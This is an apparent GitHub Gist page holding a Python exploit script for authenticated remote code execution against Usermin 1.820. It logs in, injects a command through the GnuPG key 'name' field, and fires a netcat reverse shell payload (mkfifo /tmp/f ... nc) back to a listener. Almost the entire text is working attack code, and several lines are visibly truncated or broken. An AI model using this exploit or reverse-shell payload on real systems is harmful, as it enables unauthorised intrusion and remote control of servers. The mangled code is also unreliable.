Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
# -*- coding: utf-8 -*-
# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
# author:
# usage: [-h] -u HOST -l LOGIN -p PASSWORD
import argparse,requests,warnings,json,re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd
def init():
parser = argparse.ArgumentParser(description='Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )')
parser.add_argument('-u','--host',help='Host', type=str, required=True)
parser.add_argument('-l', '--login',help='Username', type=str, required=True)
parser.add_argument('-p', '--password',help='Password', type=str, required=True)
args = parser.parse_args()
def exploit(args):
listen_ip = ""
listen_port = 1337
session = requests.Session()
target = "https://{}:20000".format(
username = args.login
password = args.password
print("[+] Target {}".format(target))
headers = {
'Cookie': 'redirect=1; testing=1;',
'Referer': target
login ="/session_login.cgi", headers=headers, verify=False, data={"user":username,"pass":password})
login_content = str(login.content)
search = "webmin_search.cgi"
check_login_string = re.findall(search,login_content)
if check_login_string:
session_hand_login = session.cookies.get_dict()
print("[+] Login successfully")
print("[+] Setup GnuPG")
payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;".format(listen_ip,listen_port)
#payload = "whoami;"
post_data = {
"name":'";{}echo "'.format(payload),
print("[+] Payload {}".format(post_data))
session.headers.update({'referer': target})
create_secret ="/gnupg/secret.cgi", verify=False, data=post_data)
create_secret_content = str(create_secret.content)
search = "successfully"
check_exp = re.findall(search,create_secret_content)
if check_exp:
print("[+] Setup successful")
print("[+] Fetching key list")
session.headers.update({'referer': target})
key_list ="/gnupg/list_keys.cgi", verify=False)
last_gets_key = re.findall("edit_key.cgi\?(.*?)'",str(key_list.content))[-2]
print("[+] Key : {}".format(last_gets_key))
session.headers.update({'referer': target})
key_list ="/gnupg/edit_key.cgi?{}".format(last_gets_key), verify=False, timeout=3)
except requests.exceptions.ReadTimeout:
print("[+] 5ucc355fully_3xpl017")
print("[-] an unexpected error occurred" )
print("[-] AUTH : Login failed.")
if __name__ == "__main__":
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment